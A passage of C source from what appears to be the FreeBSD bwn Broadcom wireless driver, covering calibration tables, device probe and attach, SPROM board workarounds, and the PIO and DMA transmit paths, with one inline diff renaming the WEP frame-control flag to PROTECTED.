-62, 26 }, }; static const struct bwn_rxcompco bwn_rxcompco_r2 = { 0, -64, 0 }; static const uint8_t bwn_tab_sigsq_tbl[] = { 0xde, 0xdc, 0xda, 0xd8, 0xd6, 0xd4, 0xd2, 0xcf, 0xcd, 0xca, 0xc7, 0xc4, 0xc1, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0x00, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xbe, 0xc1, 0xc4, 0xc7, 0xca, 0xcd, 0xcf, 0xd2, 0xd4, 0xd6, 0xd8, 0xda, 0xdc, 0xde, }; static const uint8_t bwn_tab_pllfrac_tbl[] = { 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x00, 0x00, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, }; static const uint16_t bwn_tabl_iqlocal_tbl[] = { 0x0200, 0x0300, 0x0400, 0x0600, 
0x0800, 0x0b00, 0x1000, 0x1001, 0x1002, 0x1003, 0x1004, 0x1005, 0x1006, 0x1007, 0x1707, 0x2007, 0x2d07, 0x4007, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0200, 0x0300, 0x0400, 0x0600, 0x0800, 0x0b00, 0x1000, 0x1001, 0x1002, 0x1003, 0x1004, 0x1005, 0x1006, 0x1007, 0x1707, 0x2007, 0x2d07, 0x4007, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x4000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, }; static const uint16_t bwn_tab_noise_g1[] = BWN_TAB_NOISE_G1; static const uint16_t bwn_tab_noise_g2[] = BWN_TAB_NOISE_G2; static const uint16_t bwn_tab_noisescale_g1[] = BWN_TAB_NOISESCALE_G1; static const uint16_t bwn_tab_noisescale_g2[] = BWN_TAB_NOISESCALE_G2; static const uint16_t bwn_tab_noisescale_g3[] = BWN_TAB_NOISESCALE_G3; const uint8_t bwn_bitrev_table[256] = BWN_BITREV_TABLE; #define VENDOR_LED_ACT(vendor) \ { \ .vid = PCI_VENDOR_##vendor, \ .led_act = { BWN_VENDOR_LED_ACT_##vendor } \ } static const struct { uint16_t vid; uint8_t led_act[BWN_LED_MAX]; } bwn_vendor_led_act[] = { VENDOR_LED_ACT(COMPAQ), VENDOR_LED_ACT(ASUSTEK) }; static const uint8_t bwn_default_led_act[BWN_LED_MAX] = { BWN_VENDOR_LED_ACT_DEFAULT }; #undef VENDOR_LED_ACT static const struct { int on_dur; int off_dur; } bwn_led_duration[109] = { [0] = { 400, 100 }, [2] = { 150, 75 }, [4] = { 90, 45 }, [11] = { 66, 34 }, [12] = { 53, 26 }, [18] = { 42, 21 }, [22] = { 35, 17 }, [24] = { 32, 16 }, [36] = { 21, 10 }, [48] = { 16, 8 }, [72] = { 11, 5 }, [96] = { 9, 4 }, [108] = { 7, 3 } }; static const uint16_t bwn_wme_shm_offsets[] = { [0] = BWN_WME_BESTEFFORT, [1] = BWN_WME_BACKGROUND, [2] = BWN_WME_VOICE, [3] = BWN_WME_VIDEO, }; static const struct siba_devid bwn_devs[] = { SIBA_DEV(BROADCOM, 80211, 5, "Revision 5"), SIBA_DEV(BROADCOM, 80211, 6, "Revision 6"), SIBA_DEV(BROADCOM, 80211, 7, "Revision 7"), SIBA_DEV(BROADCOM, 80211, 9, "Revision 9"), SIBA_DEV(BROADCOM, 80211, 10, "Revision 10"), SIBA_DEV(BROADCOM, 80211, 11, "Revision 11"), SIBA_DEV(BROADCOM, 80211, 13, "Revision 13"), SIBA_DEV(BROADCOM, 80211, 15, "Revision 15"), SIBA_DEV(BROADCOM, 80211, 16, "Revision 16") }; static int bwn_probe(device_t dev) { int i; for (i = 0; i < sizeof(bwn_devs) / sizeof(bwn_devs[0]); i++) { if (siba_get_vendor(dev) == bwn_devs[i].sd_vendor && siba_get_device(dev) == bwn_devs[i].sd_device && siba_get_revid(dev) == bwn_devs[i].sd_rev) return (BUS_PROBE_DEFAULT); } return (ENXIO); } static int bwn_attach(device_t dev) { struct bwn_mac *mac; struct bwn_softc *sc = device_get_softc(dev); int error, i, msic, reg; sc->sc_dev = dev; #ifdef BWN_DEBUG sc->sc_debug = bwn_debug; #endif if ((sc->sc_flags & BWN_FLAG_ATTACHED) == 0) { error = bwn_attach_pre(sc); if (error != 0) return (error); bwn_sprom_bugfixes(dev); sc->sc_flags |= BWN_FLAG_ATTACHED; } if (!TAILQ_EMPTY(&sc->sc_maclist)) { if (siba_get_pci_device(dev) != 0x4313 && siba_get_pci_device(dev) != 0x431a && siba_get_pci_device(dev) != 0x4321) { device_printf(sc->sc_dev, "skip 802.11 cores\n"); return (ENODEV); } } mac = (struct bwn_mac *)malloc(sizeof(*mac), M_DEVBUF, M_NOWAIT | M_ZERO); if (mac == NULL) return (ENOMEM); mac->mac_sc = sc; mac->mac_status = 
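/*
 * A single softc may carry several 802.11 cores; extra cores are only
 * attached on the handful of PCI IDs known to use them (0x4313, 0x431a,
 * 0x4321) and are skipped otherwise, as checked just above.
 */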
BWN_MAC_STATUS_UNINIT; if (bwn_bfp != 0) mac->mac_flags |= BWN_MAC_FLAG_BADFRAME_PREEMP; TASK_INIT(&mac->mac_hwreset, 0, bwn_hwreset, mac); TASK_INIT(&mac->mac_intrtask, 0, bwn_intrtask, mac); TASK_INIT(&mac->mac_txpower, 0, bwn_txpwr, mac); error = bwn_attach_core(mac); if (error) goto fail0; bwn_led_attach(mac); device_printf(sc->sc_dev, "WLAN (chipid %#x rev %u) " "PHY (analog %d type %d rev %d) RADIO (manuf %#x ver %#x rev %d)\n", siba_get_chipid(sc->sc_dev), siba_get_revid(sc->sc_dev), mac->mac_phy.analog, mac->mac_phy.type, mac->mac_phy.rev, mac->mac_phy.rf_manuf, mac->mac_phy.rf_ver, mac->mac_phy.rf_rev); if (mac->mac_flags & BWN_MAC_FLAG_DMA) device_printf(sc->sc_dev, "DMA (%d bits)\n", mac->mac_method.dma.dmatype); else device_printf(sc->sc_dev, "PIO\n"); /* * setup PCI resources and interrupt. */ if (pci_find_cap(dev, PCIY_EXPRESS, &reg) == 0) { msic = pci_msi_count(dev); if (bootverbose) device_printf(sc->sc_dev, "MSI count : %d\n", msic); } else msic = 0; mac->mac_intr_spec = bwn_res_spec_legacy; if (msic == BWN_MSI_MESSAGES && bwn_msi_disable == 0) { if (pci_alloc_msi(dev, &msic) == 0) { device_printf(sc->sc_dev, "Using %d MSI messages\n", msic); mac->mac_intr_spec = bwn_res_spec_msi; mac->mac_msi = 1; } } error = bus_alloc_resources(dev, mac->mac_intr_spec, mac->mac_res_irq); if (error) { device_printf(sc->sc_dev, "couldn't allocate IRQ resources (%d)\n", error); goto fail1; } if (mac->mac_msi == 0) error = bus_setup_intr(dev, mac->mac_res_irq[0], INTR_TYPE_NET | INTR_MPSAFE, bwn_intr, NULL, mac, &mac->mac_intrhand[0]); else { for (i = 0; i < BWN_MSI_MESSAGES; i++) { error = bus_setup_intr(dev, mac->mac_res_irq[i], INTR_TYPE_NET | INTR_MPSAFE, bwn_intr, NULL, mac, &mac->mac_intrhand[i]); if (error != 0) { device_printf(sc->sc_dev, "couldn't setup interrupt (%d)\n", error); break; } } } TAILQ_INSERT_TAIL(&sc->sc_maclist, mac, mac_list); /* * calls attach-post routine */ if ((sc->sc_flags & BWN_FLAG_ATTACHED) != 0) bwn_attach_post(sc); return (0); fail1: if (msic == BWN_MSI_MESSAGES && bwn_msi_disable == 0) pci_release_msi(dev); fail0: free(mac, M_DEVBUF); return (error); } static int bwn_is_valid_ether_addr(uint8_t *addr) { char zero_addr[6] = { 0, 0, 0, 0, 0, 0 }; if ((addr[0] & 1) || (!bcmp(addr, zero_addr, ETHER_ADDR_LEN))) return (FALSE); return (TRUE); } static int bwn_attach_post(struct bwn_softc *sc) { struct ieee80211com *ic; struct ifnet *ifp = sc->sc_ifp; ic = ifp->if_l2com; ic->ic_ifp = ifp; /* XXX not right but it's not used anywhere important */ ic->ic_phytype = IEEE80211_T_OFDM; ic->ic_opmode = IEEE80211_M_STA; ic->ic_caps = IEEE80211_C_STA /* station mode supported */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_AHDEMO /* adhoc demo mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_WME /* WME/WMM supported */ | IEEE80211_C_WPA /* capable of WPA1+WPA2 */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ | IEEE80211_C_TXPMGT /* capable of txpow mgt */ ; ic->ic_flags_ext |= IEEE80211_FEXT_SWBMISS; /* s/w bmiss */ /* call MI attach routine. */ ieee80211_ifattach(ic, bwn_is_valid_ether_addr(siba_sprom_get_mac_80211a(sc->sc_dev)) ?
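/*
 * The station address handed to net80211 is the 802.11a MAC from the
 * SPROM when bwn_is_valid_ether_addr() accepts it (not multicast, not
 * all zero), with the 802.11b/g MAC as the fallback.
 */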
siba_sprom_get_mac_80211a(sc->sc_dev) : siba_sprom_get_mac_80211bg(sc->sc_dev)); ic->ic_headroom = sizeof(struct bwn_txhdr); /* override default methods */ ic->ic_raw_xmit = bwn_raw_xmit; ic->ic_updateslot = bwn_updateslot; ic->ic_update_promisc = bwn_update_promisc; ic->ic_wme.wme_update = bwn_wme_update; ic->ic_scan_start = bwn_scan_start; ic->ic_scan_end = bwn_scan_end; ic->ic_set_channel = bwn_set_channel; ic->ic_vap_create = bwn_vap_create; ic->ic_vap_delete = bwn_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_tx_th.wt_ihdr, sizeof(sc->sc_tx_th), BWN_TX_RADIOTAP_PRESENT, &sc->sc_rx_th.wr_ihdr, sizeof(sc->sc_rx_th), BWN_RX_RADIOTAP_PRESENT); bwn_sysctl_node(sc); if (bootverbose) ieee80211_announce(ic); return (0); } static void bwn_phy_detach(struct bwn_mac *mac) { if (mac->mac_phy.detach != NULL) mac->mac_phy.detach(mac); } static int bwn_detach(device_t dev) { struct bwn_softc *sc = device_get_softc(dev); struct bwn_mac *mac = sc->sc_curmac; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int i; sc->sc_flags |= BWN_FLAG_INVALID; if (device_is_attached(sc->sc_dev)) { bwn_stop(sc, 1); bwn_dma_free(mac); callout_drain(&sc->sc_led_blink_ch); callout_drain(&sc->sc_rfswitch_ch); callout_drain(&sc->sc_task_ch); callout_drain(&sc->sc_watchdog_ch); bwn_phy_detach(mac); if (ifp != NULL) { ieee80211_draintask(ic, &mac->mac_hwreset); ieee80211_draintask(ic, &mac->mac_txpower); ieee80211_ifdetach(ic); if_free(ifp); } } taskqueue_drain(sc->sc_tq, &mac->mac_intrtask); taskqueue_free(sc->sc_tq); for (i = 0; i < BWN_MSI_MESSAGES; i++) { if (mac->mac_intrhand[i] != NULL) { bus_teardown_intr(dev, mac->mac_res_irq[i], mac->mac_intrhand[i]); mac->mac_intrhand[i] = NULL; } } bus_release_resources(dev, mac->mac_intr_spec, mac->mac_res_irq); if (mac->mac_msi != 0) pci_release_msi(dev); BWN_LOCK_DESTROY(sc); return (0); } static int bwn_attach_pre(struct bwn_softc *sc) { struct ifnet *ifp; int error = 0; BWN_LOCK_INIT(sc); TAILQ_INIT(&sc->sc_maclist); callout_init_mtx(&sc->sc_rfswitch_ch, &sc->sc_mtx, 0); callout_init_mtx(&sc->sc_task_ch, &sc->sc_mtx, 0); callout_init_mtx(&sc->sc_watchdog_ch, &sc->sc_mtx, 0); sc->sc_tq = taskqueue_create_fast("bwn_taskq", M_NOWAIT, taskqueue_thread_enqueue, &sc->sc_tq); taskqueue_start_threads(&sc->sc_tq, 1, PI_NET, "%s taskq", device_get_nameunit(sc->sc_dev)); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); error = ENOSPC; goto fail; } /* set these up early for if_printf use */ if_initname(ifp, device_get_name(sc->sc_dev), device_get_unit(sc->sc_dev)); ifp->if_softc = sc; ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = bwn_init; ifp->if_ioctl = bwn_ioctl; ifp->if_start = bwn_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); return (0); fail: BWN_LOCK_DESTROY(sc); return (error); } static void bwn_sprom_bugfixes(device_t dev) { #define BWN_ISDEV(_vendor, _device, _subvendor, _subdevice) \ ((siba_get_pci_vendor(dev) == PCI_VENDOR_##_vendor) && \ (siba_get_pci_device(dev) == _device) && \ (siba_get_pci_subvendor(dev) == PCI_VENDOR_##_subvendor) && \ (siba_get_pci_subdevice(dev) == _subdevice)) if (siba_get_pci_subvendor(dev) == PCI_VENDOR_APPLE && siba_get_pci_subdevice(dev) == 0x4e && siba_get_pci_revid(dev) > 0x40) siba_sprom_set_bf_lo(dev, siba_sprom_get_bf_lo(dev) | BWN_BFL_PACTRL); if (siba_get_pci_subvendor(dev) == SIBA_BOARDVENDOR_DELL && siba_get_chipid(dev) == 0x4301 && 
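/*
 * SPROM bug workarounds: Dell-branded BCM4301 boards (PCI rev 0x74)
 * apparently lack the Bluetooth coexistence boardflag, so it is forced
 * on here, while the BWN_ISDEV() list further down clears the same flag
 * on boards that advertise it incorrectly.
 */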
siba_get_pci_revid(dev) == 0x74) siba_sprom_set_bf_lo(dev, siba_sprom_get_bf_lo(dev) | BWN_BFL_BTCOEXIST); if (siba_get_type(dev) == SIBA_TYPE_PCI) { if (BWN_ISDEV(BROADCOM, 0x4318, ASUSTEK, 0x100f) || BWN_ISDEV(BROADCOM, 0x4320, DELL, 0x0003) || BWN_ISDEV(BROADCOM, 0x4320, HP, 0x12f8) || BWN_ISDEV(BROADCOM, 0x4320, LINKSYS, 0x0013) || BWN_ISDEV(BROADCOM, 0x4320, LINKSYS, 0x0014) || BWN_ISDEV(BROADCOM, 0x4320, LINKSYS, 0x0015) || BWN_ISDEV(BROADCOM, 0x4320, MOTOROLA, 0x7010)) siba_sprom_set_bf_lo(dev, siba_sprom_get_bf_lo(dev) & ~BWN_BFL_BTCOEXIST); } #undef BWN_ISDEV } static int bwn_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { #define IS_RUNNING(ifp) \ ((ifp->if_flags & IFF_UP) && (ifp->if_drv_flags & IFF_DRV_RUNNING)) struct bwn_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *)data; int error = 0, startall; switch (cmd) { case SIOCSIFFLAGS: startall = 0; if (IS_RUNNING(ifp)) { bwn_update_promisc(ifp); } else if (ifp->if_flags & IFF_UP) { if ((sc->sc_flags & BWN_FLAG_INVALID) == 0) { bwn_init(sc); startall = 1; } } else bwn_stop(sc, 1); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return (error); } static void bwn_start(struct ifnet *ifp) { struct bwn_softc *sc = ifp->if_softc; BWN_LOCK(sc); bwn_start_locked(ifp); BWN_UNLOCK(sc); } static void bwn_start_locked(struct ifnet *ifp) { struct bwn_softc *sc = ifp->if_softc; struct bwn_mac *mac = sc->sc_curmac; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct ieee80211_key *k; struct mbuf *m; BWN_ASSERT_LOCKED(sc); if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || mac == NULL || mac->mac_status < BWN_MAC_STATUS_STARTED) return; for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); /* XXX: LOCK */ if (m == NULL) break; if (bwn_tx_isfull(sc, m)) break; ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (ni == NULL) { device_printf(sc->sc_dev, "unexpected NULL ni\n"); m_freem(m); ifp->if_oerrors++; continue; } KASSERT(ni != NULL, ("%s:%d: fail", __func__, __LINE__)); wh = mtod(m, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m); if (k == NULL) { ieee80211_free_node(ni); m_freem(m); ifp->if_oerrors++; continue; } } wh = NULL; /* Catch any invalid use */ if (bwn_tx_start(sc, ni, m) != 0) { if (ni != NULL) ieee80211_free_node(ni); ifp->if_oerrors++; continue; } sc->sc_watchdog_timer = 5; } } static int bwn_tx_isfull(struct bwn_softc *sc, struct mbuf *m) { struct bwn_dma_ring *dr; struct bwn_mac *mac = sc->sc_curmac; struct bwn_pio_txqueue *tq; struct ifnet *ifp = sc->sc_ifp; int pktlen = roundup(m->m_pkthdr.len + BWN_HDRSIZE(mac), 4); BWN_ASSERT_LOCKED(sc); if (mac->mac_flags & BWN_MAC_FLAG_DMA) { dr = bwn_dma_select(mac, M_WME_GETAC(m)); if (dr->dr_stop == 1 || bwn_dma_freeslot(dr) < BWN_TX_SLOTS_PER_FRAME) { dr->dr_stop = 1; goto full; } } else { tq = bwn_pio_select(mac, M_WME_GETAC(m)); if (tq->tq_free == 0 || pktlen > tq->tq_size || pktlen > (tq->tq_size - tq->tq_used)) { tq->tq_stop = 1; goto full; } } return (0); full: IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; return (1); } static int bwn_tx_start(struct bwn_softc *sc, struct ieee80211_node *ni, struct mbuf *m) { struct bwn_mac *mac = sc->sc_curmac; int error; BWN_ASSERT_LOCKED(sc); if (m->m_pkthdr.len < IEEE80211_MIN_LEN || 
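/*
 * A note on the TX path above: bwn_start_locked() checks the Protected
 * Frame bit in the 802.11 header (IEEE80211_FC1_PROTECTED, previously
 * named IEEE80211_FC1_WEP) and, when it is set, has net80211 prepend
 * the crypto header via ieee80211_crypto_encap() before the frame
 * reaches bwn_tx_start().  Roughly:
 *
 *	wh = mtod(m, struct ieee80211_frame *);
 *	if ((wh->i_fc[1] & IEEE80211_FC1_PROTECTED) &&
 *	    ieee80211_crypto_encap(ni, m) == NULL)
 *		drop the frame (free the node and mbuf, count an oerror)
 */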
mac == NULL) { m_freem(m); return (ENXIO); } error = (mac->mac_flags & BWN_MAC_FLAG_DMA) ? bwn_dma_tx_start(mac, ni, m) : bwn_pio_tx_start(mac, ni, m); if (error) { m_freem(m); return (error); } return (0); } static int bwn_pio_tx_start(struct bwn_mac *mac, struct ieee80211_node *ni, struct mbuf *m) { struct bwn_pio_txpkt *tp; struct bwn_pio_txqueue *tq = bwn_pio_select(mac, M_WME_GETAC(m)); struct bwn_softc *sc = mac->mac_sc; struct bwn_txhdr txhdr; struct mbuf *m_new; uint32_t ctl32; int error; uint16_t ctl16; BWN_ASSERT_LOCKED(sc); /* XXX TODO send packets after DTIM */ KASSERT(!TAILQ_EMPTY(&tq->tq_pktlist), ("%s: fail", __func__)); tp = TAILQ_FIRST(&tq->tq_pktlist); tp->tp_ni = ni; tp->tp_m = m; error = bwn_set_txhdr(mac, ni, m, &txhdr, BWN_PIO_COOKIE(tq, tp)); if (error) { device_printf(sc->sc_dev, "tx fail\n"); return (error); } TAILQ_REMOVE(&tq->tq_pktlist, tp, tp_list); tq->tq_used += roundup(m->m_pkthdr.len + BWN_HDRSIZE(mac), 4); tq->tq_free--; if (siba_get_revid(sc->sc_dev) >= 8) { /* * XXX please removes m_defrag(9) */ m_new = m_defrag(m, M_NOWAIT); if (m_new == NULL) { device_printf(sc->sc_dev, "%s: can't defrag TX buffer\n", __func__); return (ENOBUFS); } if (m_new->m_next != NULL) device_printf(sc->sc_dev, "TODO: fragmented packets for PIO\n"); tp->tp_m = m_new; /* send HEADER */ ctl32 = bwn_pio_write_multi_4(mac, tq, (BWN_PIO_READ_4(mac, tq, BWN_PIO8_TXCTL) | BWN_PIO8_TXCTL_FRAMEREADY) & ~BWN_PIO8_TXCTL_EOF, (const uint8_t *)&txhdr, BWN_HDRSIZE(mac)); /* send BODY */ ctl32 = bwn_pio_write_multi_4(mac, tq, ctl32, mtod(m_new, const void *), m_new->m_pkthdr.len); bwn_pio_write_4(mac, tq, BWN_PIO_TXCTL, ctl32 | BWN_PIO8_TXCTL_EOF); } else { ctl16 = bwn_pio_write_multi_2(mac, tq, (bwn_pio_read_2(mac, tq, BWN_PIO_TXCTL) | BWN_PIO_TXCTL_FRAMEREADY) & ~BWN_PIO_TXCTL_EOF, (const uint8_t *)&txhdr, BWN_HDRSIZE(mac)); ctl16 = bwn_pio_write_mbuf_2(mac, tq, ctl16, m); BWN_PIO_WRITE_2(mac, tq, BWN_PIO_TXCTL, ctl16 | BWN_PIO_TXCTL_EOF); } return (0); } static struct bwn_pio_txqueue * bwn_pio_select(struct bwn_mac *mac, uint8_t prio) { if ((mac->mac_flags & BWN_MAC_FLAG_WME) == 0) return (&mac->mac_method.pio.wme[WME_AC_BE]); switch (prio) { case 0: return (&mac->mac_method.pio.wme[WME_AC_BE]); case 1: return (&mac->mac_method.pio.wme[WME_AC_BK]); case 2: return (&mac->mac_method.pio.wme[WME_AC_VI]); case 3: return (&mac->mac_method.pio.wme[WME_AC_VO]); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (NULL); } static int bwn_dma_tx_start(struct bwn_mac *mac, struct ieee80211_node *ni, struct mbuf *m) { #define BWN_GET_TXHDRCACHE(slot) \ &(txhdr_cache[(slot / BWN_TX_SLOTS_PER_FRAME) * BWN_HDRSIZE(mac)]) struct bwn_dma *dma = &mac->mac_method.dma; struct bwn_dma_ring *dr = bwn_dma_select(mac, M_WME_GETAC(m)); struct bwn_dmadesc_generic *desc; struct bwn_dmadesc_meta *mt; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; uint8_t *txhdr_cache = (uint8_t *)dr->dr_txhdr_cache; int error, slot, backup[2] = { dr->dr_curslot, dr->dr_usedslot }; BWN_ASSERT_LOCKED(sc); KASSERT(!dr->dr_stop, ("%s:%d: fail", __func__, __LINE__)); /* XXX send after DTIM */ slot = bwn_dma_getslot(dr); dr->getdesc(dr, slot, &desc, &mt); KASSERT(mt->mt_txtype == BWN_DMADESC_METATYPE_HEADER, ("%s:%d: fail", __func__, __LINE__)); error = bwn_set_txhdr(dr->dr_mac, ni, m, (struct bwn_txhdr *)BWN_GET_TXHDRCACHE(slot), BWN_DMA_COOKIE(dr, slot)); if (error) goto fail; error = bus_dmamap_load(dr->dr_txring_dtag, mt->mt_dmap, BWN_GET_TXHDRCACHE(slot), BWN_HDRSIZE(mac), bwn_dma_ring_addr, 
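/*
 * DMA TX uses two descriptor slots per frame: one for the driver-built
 * bwn_txhdr being loaded here out of dr_txhdr_cache, and one for the
 * mbuf payload.  A payload that cannot be mapped in one piece (EFBIG)
 * is linearized with m_defrag() and loaded again once.
 */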
&mt->mt_paddr, BUS_DMA_NOWAIT); if (error) { if_printf(ifp, "%s: can't load TX buffer (1) %d\n", __func__, error); goto fail; } bus_dmamap_sync(dr->dr_txring_dtag, mt->mt_dmap, BUS_DMASYNC_PREWRITE); dr->setdesc(dr, desc, mt->mt_paddr, BWN_HDRSIZE(mac), 1, 0, 0); bus_dmamap_sync(dr->dr_ring_dtag, dr->dr_ring_dmap, BUS_DMASYNC_PREWRITE); slot = bwn_dma_getslot(dr); dr->getdesc(dr, slot, &desc, &mt); KASSERT(mt->mt_txtype == BWN_DMADESC_METATYPE_BODY && mt->mt_islast == 1, ("%s:%d: fail", __func__, __LINE__)); mt->mt_m = m; mt->mt_ni = ni; error = bus_dmamap_load_mbuf(dma->txbuf_dtag, mt->mt_dmap, m, bwn_dma_buf_addr, &mt->mt_paddr, BUS_DMA_NOWAIT); if (error && error != EFBIG) { if_printf(ifp, "%s: can't load TX buffer (1) %d\n", __func__, error); goto fail; } if (error) { /* error == EFBIG */ struct mbuf *m_new; m_new = m_defrag(m, M_NOWAIT); if (m_new == NULL) { if_printf(ifp, "%s: can't defrag TX buffer\n", __func__); error = ENOBUFS; goto fail; } else { m = m_new; } mt->mt_m = m; error = bus_dmamap_load_mbuf(dma->txbuf_dtag, mt->mt_dmap, m, bwn_dma_buf_addr, &mt->mt_paddr, BUS_DMA_NOWAIT); if (error) { if_printf(ifp, "%s: can't load TX buffer (2) %d\n", __func__, error); goto fail; } } bus_dmamap_sync(dma->txbuf_dtag, mt->mt_dmap, BUS_DMASYNC_PREWRITE); dr->setdesc(dr, desc, mt->mt_paddr, m->m_pkthdr.len, 0, 1, 1); bus_dmamap_sync(dr->dr_ring_dtag, dr->dr_ring_dmap, BUS_DMASYNC_PREWRITE); /* XXX send after DTIM */ dr->start_transfer(dr, bwn_dma_nextslot(dr, slot)); return (0); fail: dr->dr_curslot = backup[0]; dr->dr_usedslot = backup[1]; return (error); #undef BWN_GET_TXHDRCACHE } static void bwn_watchdog(void *arg) { struct bwn_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (sc->sc_watchdog_timer != 0 && --sc->sc_watchdog_timer == 0) { if_printf(ifp, "device timeout\n"); ifp->if_oerrors++; } callout_schedule(&sc->sc_watchdog_ch, hz); } static int bwn_attach_core(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; int error, have_bg = 0, have_a = 0; uint32_t high; KASSERT(siba_get_revid(sc->sc_dev) >= 5, ("unsupported revision %d", siba_get_revid(sc->sc_dev))); siba_powerup(sc->sc_dev, 0); high = siba_read_4(sc->sc_dev, SIBA_TGSHIGH); bwn_reset_core(mac, (high & BWN_TGSHIGH_HAVE_2GHZ) ? BWN_TGSLOW_SUPPORT_G : 0); error = bwn_phy_getinfo(mac, high); if (error) goto fail; have_a = (high & BWN_TGSHIGH_HAVE_5GHZ) ? 1 : 0; have_bg = (high & BWN_TGSHIGH_HAVE_2GHZ) ? 
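/*
 * Band support starts from the core's TGSHIGH capability flags and is
 * then refined: for most PCI IDs it is re-derived from the PHY type,
 * and 5GHz (A PHY) operation is switched off afterwards for anything
 * other than LP and N PHYs, matching the XXX note below.
 */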
1 : 0; if (siba_get_pci_device(sc->sc_dev) != 0x4312 && siba_get_pci_device(sc->sc_dev) != 0x4319 && siba_get_pci_device(sc->sc_dev) != 0x4324) { have_a = have_bg = 0; if (mac->mac_phy.type == BWN_PHYTYPE_A) have_a = 1; else if (mac->mac_phy.type == BWN_PHYTYPE_G || mac->mac_phy.type == BWN_PHYTYPE_N || mac->mac_phy.type == BWN_PHYTYPE_LP) have_bg = 1; else KASSERT(0 == 1, ("%s: unknown phy type (%d)", __func__, mac->mac_phy.type)); } /* XXX turns off PHY A because it's not supported */ if (mac->mac_phy.type != BWN_PHYTYPE_LP && mac->mac_phy.type != BWN_PHYTYPE_N) { have_a = 0; have_bg = 1; } if (mac->mac_phy.type == BWN_PHYTYPE_G) { mac->mac_phy.attach = bwn_phy_g_attach; mac->mac_phy.detach = bwn_phy_g_detach; mac->mac_phy.prepare_hw = bwn_phy_g_prepare_hw; mac->mac_phy.init_pre = bwn_phy_g_init_pre; mac->mac_phy.init = bwn_phy_g_init; mac->mac_phy.exit = bwn_phy_g_exit; mac->mac_phy.phy_read = bwn_phy_g_read; mac->mac_phy.phy_write = bwn_phy_g_write; mac->mac_phy.rf_read = bwn_phy_g_rf_read; mac->mac_phy.rf_write = bwn_phy_g_rf_write; mac->mac_phy.use_hwpctl = bwn_phy_g_hwpctl; mac->mac_phy.rf_onoff = bwn_phy_g_rf_onoff; mac->mac_phy.switch_analog = bwn_phy_switch_analog; mac->mac_phy.switch_channel = bwn_phy_g_switch_channel; mac->mac_phy.get_default_chan = bwn_phy_g_get_default_chan; mac->mac_phy.set_antenna = bwn_phy_g_set_antenna; mac->mac_phy.set_im = bwn_phy_g_im; mac->mac_phy.recalc_txpwr = bwn_phy_g_recalc_txpwr; mac->mac_phy.set_txpwr = bwn_phy_g_set_txpwr; mac->mac_phy.task_15s = bwn_phy_g_task_15s; mac->mac_phy.task_60s = bwn_phy_g_task_60s; } else if (mac->mac_phy.type == BWN_PHYTYPE_LP) { mac->mac_phy.init_pre = bwn_phy_lp_init_pre; mac->mac_phy.init = bwn_phy_lp_init; mac->mac_phy.phy_read = bwn_phy_lp_read; mac->mac_phy.phy_write = bwn_phy_lp_write; mac->mac_phy.phy_maskset = bwn_phy_lp_maskset; mac->mac_phy.rf_read = bwn_phy_lp_rf_read; mac->mac_phy.rf_write = bwn_phy_lp_rf_write; mac->mac_phy.rf_onoff = bwn_phy_lp_rf_onoff; mac->mac_phy.switch_analog = bwn_phy_lp_switch_analog; mac->mac_phy.switch_channel = bwn_phy_lp_switch_channel; mac->mac_phy.get_default_chan = bwn_phy_lp_get_default_chan; mac->mac_phy.set_antenna = bwn_phy_lp_set_antenna; mac->mac_phy.task_60s = bwn_phy_lp_task_60s; } else { device_printf(sc->sc_dev, "unsupported PHY 